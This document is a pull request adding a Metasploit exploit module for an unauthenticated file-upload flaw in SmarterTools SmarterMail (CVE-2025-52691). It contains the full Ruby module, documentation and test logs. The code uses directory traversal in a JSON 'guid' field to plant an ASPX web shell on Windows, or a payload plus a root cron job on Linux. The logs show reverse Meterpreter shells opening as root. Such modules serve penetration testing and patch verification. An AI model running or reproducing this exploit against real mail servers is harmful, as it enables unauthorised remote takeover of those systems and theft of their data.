### PR TITLE
SmarterTools SmarterMail Unauth File Upload RCE [CVE-2025-52691]

### DIFF
--- a/documentation/modules/exploit/multi/http/smartermail_guid_file_upload.md
+++ b/documentation/modules/exploit/multi/http/smartermail_guid_file_upload.md
@@ -1,0 +1,121 @@
+## Vulnerable Application
+This module exploits a pre-auth remote code execution vulnerability in SmarterTools SmarterMail before version 100.0.9413.
+The endpoint /api/upload fails to sanitize the contextData POST parameter which can contain JSON data with a
+"guid" key that allows directory traversal. By leveraging this vulnerability, an unauthenticated attacker can
+upload a malicious ASPX web shell to the server's web root directory, leading to remote code execution.
+
+## Setup 
+
+### Linux 
+On Ubuntu 22, ensure that `curl` and `libicu` installed and then run the following:
+```
+curl -O https://downloads.smartertools.com/smartermail/100.0.9406/smartermail_9406 \
+&& chmod +x smartermail_9406 \
+&& sudo ./smartermail_9406 install
+```
+Navigate to `http://localhost` and complete the installation Wizard which involves setting the webroot, choosing a port to host the application on and creating an admin user.
+
+If Docker is preferred, a full setup instructions can be founds here: https://help.smartertools.com/SmarterMail/Current/Topics/Installation/Installation-Docker
+
+### Windows
+On Windows Server 2022 (using Windows 10 or 11 will result in IIS errors), download the SmarterMail installer from:
+https://downloads.smartertools.com/smartermail/100.0.9406/SmarterMail_9406.exe. Run the installer.
+
+Navigate to `http://localhost` and complete the installation Wizard which involves setting the webroot, choosing a port to host the application on and creating an admin user.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use  modules/exploits/multi/http/smarter_mail_guid_file_upload.`
+3. `set RHOSTS [IP]`
+4. `run`
+
+## Options
+
+### WEB_ROOT
+The webroot of the SmarterMail server. The webroot must be known in order to write the payload and call it afterwards.
+The default webroot on Windows is C:\inetpub\wwwroot\ and on Linux is /opt/smartermail/wwwroot. If this option is left
+blank, the module will use the default paths based on the target selected.
+
+### WEB_ROOT_RPORT
+The port on which the webroot is being hosted on. For example, IIS typically hosts the webroot on port 80 or 443, whereas
+SmarterMail is hosted on a different port (default 9998) which is configured during the installation setup. On Linux by
+default SmarterMail is hosted on port 80 which is the same as the web root rport so it does not have to be set in this scenario.
+This option is used when calling the uploaded payload after a successful upload.
+
+### DEPTH
+Depth for path traversal. Default: 15
+
+## Scenarios
+
+### Ubuntu 22.04 with SmarterMail 100.0.9406
+```
+msf exploit(multi/http/smartermail_guid_file_upload) > set rhosts 192.168.1.90
+rhosts => 192.168.1.90
+msf exploit(multi/http/smartermail_guid_file_upload) > set lhost 192.168.1.68
+lhost => 192.168.1.68
+msf exploit(multi/http/smartermail_guid_file_upload) > exploit
+[*] Started reverse TCP handler on 192.168.1.68:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking target web server for a response...
+[+] Target is running SmarterMail.
+[*] Checking SmarterMail product version...
+[+] Target is running SmarterMail Version 100.0.9406.
+[+] The target appears to be vulnerable.
+[*] Uploading payload to /tmp...
+[+] The uploaded payload file is named: ntww_0
+[*] Uploading cronjob to call payload...
+[+] The uploaded payload file is named: bteqkp_0
+[*] Sending stage (3090404 bytes) to 192.168.1.90
+[+] Deleted /tmp/ntww_0
+[+] Deleted /etc/cron.d/bteqkp_0
+[*] Meterpreter session 7 opened (192.168.1.68:4444 -> 192.168.1.90:41170) at 2026-01-13 17:16:01 -0800
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.1.90
+OS           : Ubuntu 22.04 (Linux 6.8.0-90-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+### Windows Server 2022 with SmarterMail 100.0.9406
+```
+msf exploit(multi/http/smartermail_guid_file_upload) > set rhosts 172.16.199.135
+rhosts => 172.16.199.135
+msf exploit(multi/http/smartermail_guid_file_upload) > set rport 17017
+rport => 17017
+msf exploit(multi/http/smartermail_guid_file_upload) > set web_root_rport 80
+web_root_rport => 80
+msf exploit(multi/http/smartermail_guid_file_upload) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf exploit(multi/http/smartermail_guid_file_upload) > set target 1
+target => 1
+msf exploit(multi/http/smartermail_guid_file_upload) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+[*] Started reverse TCP handler on 172.16.199.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking target web server for a response...
+[+] Target is running SmarterMail.
+[*] Checking SmarterMail product version...
+[+] Target is running SmarterMail Version 100.0.9406.
+[+] The target appears to be vulnerable.
+[*] Uploading payload to /inetpub/wwwroot...
+[+] The uploaded payload file is named: puxqskqt_0.aspx
+[*] Sending stage (232006 bytes) to 172.16.199.135
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:51565) at 2026-01-13 10:25:01 -0800
+
+meterpreter > getuid
+Server username: IIS APPPOOL\DefaultAppPool
+meterpreter > sysinfo
+Computer        : DC3
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : MSF
+Logged On Users : 8
+Meterpreter     : x64/windows
+``` 

--- a/documentation/modules/exploit/multi/http/smartermail_guid_file_upload.md
+++ b/documentation/modules/exploit/multi/http/smartermail_guid_file_upload.md
@@ -28,20 +28,23 @@ Navigate to `http://localhost` and complete the installation Wizard which involv
 1. Start `msfconsole`
 2. `use  modules/exploits/multi/http/smarter_mail_guid_file_upload.`
 3. `set RHOSTS [IP]`
+3. `set LHOST [IP]`
+4. (Optional) `set TARGET [0-1]` (0 for Linux, 1 for Windows)
+5. (Optional) `set WEB_ROOT_RPORT [PORT]` (default: 80 for Windows)
+6. (Optional) `set TARGET_DIR [PATH]` (default: /tmp for Linux, /inetpub/wwwroot for Windows)
 4. `run`
 
 ## Options
 
-### WEB_ROOT
-The webroot of the SmarterMail server. The webroot must be known in order to write the payload and call it afterwards.
-The default webroot on Windows is C:\inetpub\wwwroot\ and on Linux is /opt/smartermail/wwwroot. If this option is left
-blank, the module will use the default paths based on the target selected.
+### TARGET_DIR
+The directory to upload the payload to. If the target is Linux, the default is /tmp. If the target is Windows,
+the default is /inetpub/wwwroot.
 
 ### WEB_ROOT_RPORT
-The port on which the webroot is being hosted on. For example, IIS typically hosts the webroot on port 80 or 443, whereas
-SmarterMail is hosted on a different port (default 9998) which is configured during the installation setup. On Linux by
-default SmarterMail is hosted on port 80 which is the same as the web root rport so it does not have to be set in this scenario.
-This option is used when calling the uploaded payload after a successful upload.
+The port on which the webroot is being hosted on, this is specifically used when exploiting Windows targets.
+IIS typically hosts the webroot on port 80 or 443, whereas SmarterMail is hosted on a different port (default 9998)
+which is configured during the installation setup. The exploit drops the .aspx file in the webroot, so the correct port
+must be specified in order to for it to be executed. Default: 80
 
 ### DEPTH
 Depth for path traversal. Default: 15

--- a/lib/msf/core/exploit/remote/http/smartermail.rb
+++ b/lib/msf/core/exploit/remote/http/smartermail.rb
@@ -35,10 +35,10 @@ module Msf
             print_good("Target is running SmarterMail Version #{version_number}.")
 
             if Rex::Version.new(version_number) < Rex::Version.new(patched_version) && Rex::Version.new(version_number) >= Rex::Version.new(low_bound)
-              return CheckCode::Appears
+              return CheckCode::Appears('SmarterMail version is vulnerable.')
             end
 
-            return CheckCode::Safe
+            return CheckCode::Safe('SmarterMail version is patched or not vulnerable.')
 
           end
         end

--- a/lib/msf/core/exploit/remote/http/smartermail.rb
+++ b/lib/msf/core/exploit/remote/http/smartermail.rb
@@ -1,0 +1,48 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        module Smartermail
+          def check_version(patched_version, low_bound = 0)
+            print_status('Checking target web server for a response...')
+            res = send_request_cgi!({
+                                      'method' => 'GET',
+                                      'uri' => normalize_uri(target_uri.path)
+                                    })
+
+            if res
+              body = res.body
+            else
+              return CheckCode::Unknown('Target did not respond to check request.')
+            end
+
+            unless res.code == 200 && body.downcase.include?('smartermail')
+              return CheckCode::Unknown('Target is not running SmarterMail.')
+            end
+
+            print_good('Target is running SmarterMail.')
+
+            print_status('Checking SmarterMail product version...')
+            product_version = body.match('stProductVersion.*')
+            version_number = product_version.to_s.split('"')[1] if product_version
+
+            unless product_version
+              return CheckCode::Detected('SmarterMail product version cannot be determined.')
+            end
+
+            print_good("Target is running SmarterMail Version #{version_number}.")
+
+            if Rex::Version.new(version_number) < Rex::Version.new(patched_version) && Rex::Version.new(version_number) >= Rex::Version.new(low_bound)
+              return CheckCode::Appears
+            end
+
+            return CheckCode::Safe
+
+          end
+        end
+      end
+    end
+  end
+end

--- a/modules/exploits/multi/http/smartermail_guid_file_upload.rb
+++ b/modules/exploits/multi/http/smartermail_guid_file_upload.rb
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
       payload_path = "#{target_dir}/#{uploaded_filename}"
       cron_command = "chmod +x #{payload_path} && #{payload_path}&"
       cron_contents = "* * * * * root /bin/bash -c '#{cron_command}'\n"
-      cron_filename = Rex::Text.rand_text_alpha(4..12)
+      cron_filename = Rex::Text.rand_text_alpha(8..12)
       cron_target_dir = '/etc/cron.d'
       print_status('Uploading cronjob to call payload...')
       uploaded_cron_filename = upload_payload(cron_target_dir, cron_filename, cron_contents)

--- a/modules/exploits/multi/http/smartermail_guid_file_upload.rb
+++ b/modules/exploits/multi/http/smartermail_guid_file_upload.rb
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'The path of a backdoor shell', '']),
         OptInt.new('DEPTH', [true, 'Traversal Depth', 15]),
-        OptInt.new('WEB_ROOT_RPORT', [true, 'The port in which the webroot is served on. Note on Windows this is different from the modules\'s RPORT', 80]),
+        OptInt.new('WEB_ROOT_RPORT', [true, 'The port in which the webroot is served on. Note on Windows this is different from the modules\'s RPORT', 80], conditions: %w[TARGET == 1]),
         OptString.new('TARGET_DIR', [false, 'Directory to place the payload, on Windows this defaults to the WebRoot, on Linux/Unix it defaults to /tmp which gets called by a cron job', ''])
       ]
     )
@@ -104,10 +104,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def upload_payload(target_dir, filename, pload_contents)
     post_data = Rex::MIME::Message.new
-    target_dir = target_dir.sub(%r{^/}, '') if target_dir.start_with?('/')
+    resumable_filename = Rex::Text.rand_text_alpha(4..8)
+    resumable_filename += '.aspx' if target['Platform'] == 'win' # the resumableFilename is where the file extension is taken from
+
     post_data.add_part('attachment', nil, nil, 'form-data; name="context"')
     post_data.add_part(filename, nil, nil, 'form-data; name="resumableIdentifier"')
-    post_data.add_part(filename, nil, nil, 'form-data; name="resumableFilename"')
+    post_data.add_part(resumable_filename, nil, nil, 'form-data; name="resumableFilename"')
     post_data.add_part("{\"guid\":\"dag/#{'../' * datastore['DEPTH']}#{target_dir}/#{filename}\"}", 'application/json', nil, 'form-data; name="contextData"')
     post_data.add_part(pload_contents, 'application/octet-stream', nil, "form-data; name=\"#{Faker::Name.first_name}\"; filename=\"#{Faker::File.file_name(dir: '').gsub('/', '')}\"")
 
@@ -120,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::UnexpectedReply, 'File upload failed') unless res && res.code == 200
     json_output = JSON.parse(res.body)
-    fail_with(Failure::UnexpectedReply, 'Unable to parse filename, cannot continue') unless json_output.key?('key') # key-ceptio
+    fail_with(Failure::UnexpectedReply, 'Unable to parse filename, cannot continue') unless json_output.key?('key')
     json_output['key'] =~ %r{([^/]+)$}
     uploaded_filename = Regexp.last_match(1)
     print_good("The uploaded payload file is named: #{uploaded_filename}")
@@ -128,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    payload_name = Rex::Text.rand_text_alpha(4..12)
+    payload_name = Rex::Text.rand_text_alpha(4..8)
     if target['Platform'] == 'win'
       target_dir = datastore['TARGET_DIR'].blank? ? '/inetpub/wwwroot' : datastore['TARGET_DIR']
       print_status("Uploading payload to #{target_dir}...")
@@ -148,10 +150,10 @@ class MetasploitModule < Msf::Exploit::Remote
       cron_command = "chmod +x #{payload_path} && #{payload_path}&"
       cron_contents = "* * * * * root /bin/bash -c '#{cron_command}'\n"
       cron_filename = Rex::Text.rand_text_alpha(4..12)
-      target_dir = '/etc/cron.d'
+      cron_target_dir = '/etc/cron.d'
       print_status('Uploading cronjob to call payload...')
-      uploaded_cron_filename = upload_payload(target_dir, cron_filename, cron_contents)
-      register_file_for_cleanup("#{target_dir}/#{uploaded_cron_filename}")
+      uploaded_cron_filename = upload_payload(cron_target_dir, cron_filename, cron_contents)
+      register_file_for_cleanup("#{cron_target_dir}/#{uploaded_cron_filename}")
     end
   end
 end

--- a/modules/exploits/multi/http/smartermail_guid_file_upload.rb
+++ b/modules/exploits/multi/http/smartermail_guid_file_upload.rb
@@ -32,7 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2025-52691']
         ],
         'License' => MSF_LICENSE,
-        'Platform' => %w[linux unix win],
         'Privileged' => false,
         'Targets' => [
           [
@@ -136,6 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Uploading payload to #{target_dir}...")
       uploaded_filename = upload_payload(target_dir, payload_name, windows_payload_wrapper)
       register_file_for_cleanup("#{target_dir}/#{uploaded_filename}")
+
       datastore['RPORT'] = datastore['WEB_ROOT_RPORT']
       send_request_cgi(
         'uri' => normalize_uri(target_uri.path, uploaded_filename),
@@ -146,6 +146,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Uploading payload to #{target_dir}...")
       uploaded_filename = upload_payload(target_dir, payload_name, payload.encoded)
       register_file_for_cleanup("#{target_dir}/#{uploaded_filename}")
+
       payload_path = "#{target_dir}/#{uploaded_filename}"
       cron_command = "chmod +x #{payload_path} && #{payload_path}&"
       cron_contents = "* * * * * root /bin/bash -c '#{cron_command}'\n"

--- a/modules/exploits/multi/http/smartermail_guid_file_upload.rb
+++ b/modules/exploits/multi/http/smartermail_guid_file_upload.rb
@@ -1,0 +1,157 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HTTP::Smartermail
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SmarterTools SmarterMail GUID File Upload Vulnerability',
+        'Description' => %q{
+          This module exploits a pre-auth remote code execution vulnerability in SmarterTools SmarterMail before version 100.0.9413.
+          The endpoint /api/upload fails to sanitize the contextData POST parameter which can contain JSON data with a
+          "guid" key that allows directory traversal. By leveraging this vulnerability, an unauthenticated attacker can
+          upload a malicious ASPX web shell to the server's web root directory, leading to remote code execution.
+        },
+        'Author' => [
+          'Piotr Bazydlo', # PoC write up
+          'Sina Kheirkhah', # PoC write up
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://labs.watchtowr.com/do-smart-people-ever-say-theyre-smart-smartertools-smartermail-pre-auth-rce-cve-2025-52691/'],
+          [ 'CVE', '2025-52691']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => %w[linux unix win],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'Type' => :nix,
+              'BadChars' => "'",
+              'DefaultOptions' => {
+                'WfsDelay' => 70
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win,
+              'BadChars' => '"'
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-10-09',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of a backdoor shell', '']),
+        OptInt.new('DEPTH', [true, 'Traversal Depth', 15]),
+        OptInt.new('WEB_ROOT_RPORT', [true, 'The port in which the webroot is served on. Note on Windows this is different from the modules\'s RPORT', 80]),
+        OptString.new('TARGET_DIR', [false, 'Directory to place the payload, on Windows this defaults to the WebRoot, on Linux/Unix it defaults to /tmp which gets called by a cron job', ''])
+      ]
+    )
+  end
+
+  def windows_payload_wrapper
+    process_start_info = Faker::Alphanumeric.alpha(number: 5)
+    process = Faker::Alphanumeric.alpha(number: 5)
+
+    <<~EOF
+      <%@ Page Language="C#" Debug="true" Trace="false" %>
+      <%@ Import Namespace="System.Diagnostics" %>
+      <script Language="c#" runat="server">
+      void Page_Load(object sender, EventArgs e)
+      {
+      ProcessStartInfo #{process_start_info} = new ProcessStartInfo();
+      #{process_start_info}.FileName = "cmd.exe";
+      #{process_start_info}.Arguments =  "/c "+ @"#{payload.encoded}";
+      #{process_start_info}.RedirectStandardOutput = true;
+      #{process_start_info}.UseShellExecute = false;
+      Process #{process} = Process.Start(#{process_start_info});
+      }
+      </script>
+    EOF
+  end
+
+  def check
+    check_version('100.0.9413')
+  end
+
+  def upload_payload(target_dir, filename, pload_contents)
+    post_data = Rex::MIME::Message.new
+    target_dir = target_dir.sub(%r{^/}, '') if target_dir.start_with?('/')
+    post_data.add_part('attachment', nil, nil, 'form-data; name="context"')
+    post_data.add_part(filename, nil, nil, 'form-data; name="resumableIdentifier"')
+    post_data.add_part(filename, nil, nil, 'form-data; name="resumableFilename"')
+    post_data.add_part("{\"guid\":\"dag/#{'../' * datastore['DEPTH']}#{target_dir}/#{filename}\"}", 'application/json', nil, 'form-data; name="contextData"')
+    post_data.add_part(pload_contents, 'application/octet-stream', nil, "form-data; name=\"#{Faker::Name.first_name}\"; filename=\"#{Faker::File.file_name(dir: '').gsub('/', '')}\"")
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'upload'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    )
+
+    fail_with(Failure::UnexpectedReply, 'File upload failed') unless res && res.code == 200
+    json_output = JSON.parse(res.body)
+    fail_with(Failure::UnexpectedReply, 'Unable to parse filename, cannot continue') unless json_output.key?('key') # key-ceptio
+    json_output['key'] =~ %r{([^/]+)$}
+    uploaded_filename = Regexp.last_match(1)
+    print_good("The uploaded payload file is named: #{uploaded_filename}")
+    uploaded_filename
+  end
+
+  def exploit
+    payload_name = Rex::Text.rand_text_alpha(4..12)
+    if target['Platform'] == 'win'
+      target_dir = datastore['TARGET_DIR'].blank? ? '/inetpub/wwwroot' : datastore['TARGET_DIR']
+      print_status("Uploading payload to #{target_dir}...")
+      uploaded_filename = upload_payload(target_dir, payload_name, windows_payload_wrapper)
+      register_file_for_cleanup("#{target_dir}/#{uploaded_filename}")
+      datastore['RPORT'] = datastore['WEB_ROOT_RPORT']
+      send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, uploaded_filename),
+        'method' => 'GET'
+      )
+    else
+      target_dir = datastore['TARGET_DIR'].blank? ? '/tmp' : datastore['TARGET_DIR']
+      print_status("Uploading payload to #{target_dir}...")
+      uploaded_filename = upload_payload(target_dir, payload_name, payload.encoded)
+      register_file_for_cleanup("#{target_dir}/#{uploaded_filename}")
+      payload_path = "#{target_dir}/#{uploaded_filename}"
+      cron_command = "chmod +x #{payload_path} && #{payload_path}&"
+      cron_contents = "* * * * * root /bin/bash -c '#{cron_command}'\n"
+      cron_filename = Rex::Text.rand_text_alpha(4..12)
+      target_dir = '/etc/cron.d'
+      print_status('Uploading cronjob to call payload...')
+      uploaded_cron_filename = upload_payload(target_dir, cron_filename, cron_contents)
+      register_file_for_cleanup("#{target_dir}/#{uploaded_cron_filename}")
+    end
+  end
+end

--- a/modules/exploits/multi/http/smartermail_guid_file_upload.rb
+++ b/modules/exploits/multi/http/smartermail_guid_file_upload.rb
@@ -71,14 +71,13 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'The path of a backdoor shell', '']),
         OptInt.new('DEPTH', [true, 'Traversal Depth', 15]),
         OptInt.new('WEB_ROOT_RPORT', [true, 'The port in which the webroot is served on. Note on Windows this is different from the modules\'s RPORT', 80], conditions: %w[TARGET == 1]),
-        OptString.new('TARGET_DIR', [false, 'Directory to place the payload, on Windows this defaults to the WebRoot, on Linux/Unix it defaults to /tmp which gets called by a cron job', ''])
+        OptString.new('TARGET_DIR', [false, 'Directory to place the payload, on Windows this defaults to the WebRoot, on Linux/Unix it defaults to /tmp which gets called by a cron job', nil])
       ]
     )
   end
 
   def windows_payload_wrapper
-    process_start_info = Faker::Alphanumeric.alpha(number: 5)
-    process = Faker::Alphanumeric.alpha(number: 5)
+    vars = Rex::RandomIdentifier::Generator.new
 
     <<~EOF
       <%@ Page Language="C#" Debug="true" Trace="false" %>
@@ -86,12 +85,12 @@ class MetasploitModule < Msf::Exploit::Remote
       <script Language="c#" runat="server">
       void Page_Load(object sender, EventArgs e)
       {
-      ProcessStartInfo #{process_start_info} = new ProcessStartInfo();
-      #{process_start_info}.FileName = "cmd.exe";
-      #{process_start_info}.Arguments =  "/c "+ @"#{payload.encoded}";
-      #{process_start_info}.RedirectStandardOutput = true;
-      #{process_start_info}.UseShellExecute = false;
-      Process #{process} = Process.Start(#{process_start_info});
+      ProcessStartInfo #{vars[:process_start_info]} = new ProcessStartInfo();
+      #{vars[:process_start_info]}.FileName = "cmd.exe";
+      #{vars[:process_start_info]}.Arguments =  "/c "+ @"#{payload.encoded}";
+      #{vars[:process_start_info]}.RedirectStandardOutput = true;
+      #{vars[:process_start_info]}.UseShellExecute = false;
+      Process #{vars[:process]} = Process.Start(#{vars[:process_start_info]});
       }
       </script>
     EOF
@@ -101,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     check_version('100.0.9413')
   end
 
-  def upload_payload(target_dir, filename, pload_contents)
+  def upload_payload(target_dir, filename, payload_contents)
     post_data = Rex::MIME::Message.new
     resumable_filename = Rex::Text.rand_text_alpha(4..8)
     resumable_filename += '.aspx' if target['Platform'] == 'win' # the resumableFilename is where the file extension is taken from
@@ -110,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data.add_part(filename, nil, nil, 'form-data; name="resumableIdentifier"')
     post_data.add_part(resumable_filename, nil, nil, 'form-data; name="resumableFilename"')
     post_data.add_part("{\"guid\":\"dag/#{'../' * datastore['DEPTH']}#{target_dir}/#{filename}\"}", 'application/json', nil, 'form-data; name="contextData"')
-    post_data.add_part(pload_contents, 'application/octet-stream', nil, "form-data; name=\"#{Faker::Name.first_name}\"; filename=\"#{Faker::File.file_name(dir: '').gsub('/', '')}\"")
+    post_data.add_part(payload_contents, 'application/octet-stream', nil, "form-data; name=\"#{Faker::Name.first_name}\"; filename=\"#{Faker::File.file_name(dir: '').gsub('/', '')}\"")
 
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'api', 'upload'),
@@ -120,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     fail_with(Failure::UnexpectedReply, 'File upload failed') unless res && res.code == 200
-    json_output = JSON.parse(res.body)
+    json_output = res.get_json_document
     fail_with(Failure::UnexpectedReply, 'Unable to parse filename, cannot continue') unless json_output.key?('key')
     json_output['key'] =~ %r{([^/]+)$}
     uploaded_filename = Regexp.last_match(1)


### PR DESCRIPTION
This module exploits a pre-auth file upload vulnerability in SmarterTools SmarterMail before version 100.0.9413. The endpoint /api/upload fails to sanitize the contextData POST parameter which can contain JSON data with a "guid" key that allows directory traversal. By leveraging this vulnerability, an unauthenticated attacker can upload a files to gain RCE.

On Windows the module drops an `.aspx` payload in a user specified directory which defaults to the webroot and executes it. Note by default IIS hosts the application on a different port than what it hosts the webroot on, so the module defines RPORT and WEB_ROOT_RPORT to account for this. 

On Linux the module drops a payload in a user specified directory which defaults to /tmp. The module then drops a cron job which executes once a minute in order to execute the payload.

The application is powered by .NET and it seems `.aspx` files are not supported by the Linux implementation of .NET so it was decided to exploit Linux targets via cron.d

## Verification
  
1. Start `msfconsole`
2. `use  modules/exploits/multi/http/smarter_mail_guid_file_upload.`
3. `set RHOSTS [IP]`
3. `set LHOST [IP]`
4. (Optional) `set TARGET [0-1]` (0 for Linux, 1 for Windows)
5. (Optional) `set WEB_ROOT_RPORT [PORT]` (default: 80 for Windows)
6. (Optional) `set TARGET_DIR [PATH]` (default: /tmp for Linux, /inetpub/wwwroot for Windows)
4. `run`

## Testing

### Ubuntu 22.04 with SmarterMail 100.0.9406
```
msf exploit(multi/http/smartermail_guid_file_upload) > set rhosts 192.168.1.90
rhosts => 192.168.1.90
msf exploit(multi/http/smartermail_guid_file_upload) > set lhost 192.168.1.68
lhost => 192.168.1.68
msf exploit(multi/http/smartermail_guid_file_upload) > exploit
[*] Started reverse TCP handler on 192.168.1.68:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product version...
[+] Target is running SmarterMail Version 100.0.9406.
[+] The target appears to be vulnerable.
[*] Uploading payload to /tmp...
[+] The uploaded payload file is named: ntww_0
[*] Uploading cronjob to call payload...
[+] The uploaded payload file is named: bteqkp_0
[*] Sending stage (3090404 bytes) to 192.168.1.90
[+] Deleted /tmp/ntww_0
[+] Deleted /etc/cron.d/bteqkp_0
[*] Meterpreter session 7 opened (192.168.1.68:4444 -> 192.168.1.90:41170) at 2026-01-13 17:16:01 -0800

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.1.90
OS           : Ubuntu 22.04 (Linux 6.8.0-90-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
